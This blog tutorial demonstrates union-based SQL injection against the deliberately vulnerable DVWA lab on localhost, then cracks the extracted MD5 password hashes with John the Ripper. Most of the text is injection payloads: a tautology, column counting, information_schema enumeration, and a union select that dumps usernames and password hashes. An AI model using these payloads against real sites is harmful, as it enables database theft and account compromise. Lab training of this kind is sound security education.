Union Based Injection using John the Ripper

Union Based Injection using John the Ripper

System used :: Kali Linux

Testing on localhost :: (DVWA)

  • Open Xampp on Linux and Start MySQL and Apache Server

  • Open Iceweasel and write 127. 0 . 0.1/login.php

Login to the Application

Username : admin , Password : password

    • Setup the security level from ‘High’ to ‘Low’ under DVWA security

    • Setup the Database under Setup tab

    • Click on SQL injection to begin testing

  • Enter 1 in the User ID Field

User sees the GET method

  • Check for Exception Handling’&Submit=Submit#

  • Checking using the True Conditions$’ or ‘1’=’1&Submit=Submit#

The above injection reveal the user id’s in the userdb database.

  • Checking for number of columns, returning the SQL query’ order by 1–+&Submit=Submit#’ order by 5–+&Submit=Submit#’ order by 3–+&Submit=Submit#’ order by 2–+&Submit=Submit#

This shows the number of columns are 2

  • Using ‘Union Select’ to consolidate 2 columns’ union select 1, 2–+&Submit=Submit#

  • For vulnerable columns, make id=-1’ union select 1, 2–+&Submit=Submit#

  • Check for version’ union select null, version()–+&Submit=Submit#

  • To search for database, version and user’ union select concat(database(), ‘ ‘, version()), user()–+&Submit=Submit#

  • To search for corresponding details’ union select null, table_name from information_schema.tables –+&Submit=Submit#

  • For checking specific table, example ‘users’ , in the particular database, here’ union select null, table_name from information_schema.tables  where table_name = “users%”–+&Submit=Submit#

This SQL query will display all the tables consisting of keyword “users”

  • Under ‘users’ table, checking for column names’ union select null, column_name from information_schema.columns  where table_name = “users”–+&Submit=Submit#

  • Checking and consolidation all the details of all the columns:’ union select concat(user_id,’ ‘,first_name,’ ‘,last_name,’ ‘avatar),concat(user,’ ‘,password) from users–+&Submit=Submit#

    • Copy the users & passwords and save them in <user>:<password> format in “password.txt” file under /Home

    • Using John the Ripper application for cracking the password, with format md5

Hence we have user names & their corresponding passwords.

This is tutorial is by lucideus (rahul tyagi ) Images Quality may not good so that post can load in a proper time ,stay tuned for more tutorials

Read More :Special Interview of India’s Famous White Hat Hacker Rahul Tyagi | Lucideus

Leave a Reply

Your email address will not be published. Required fields are marked *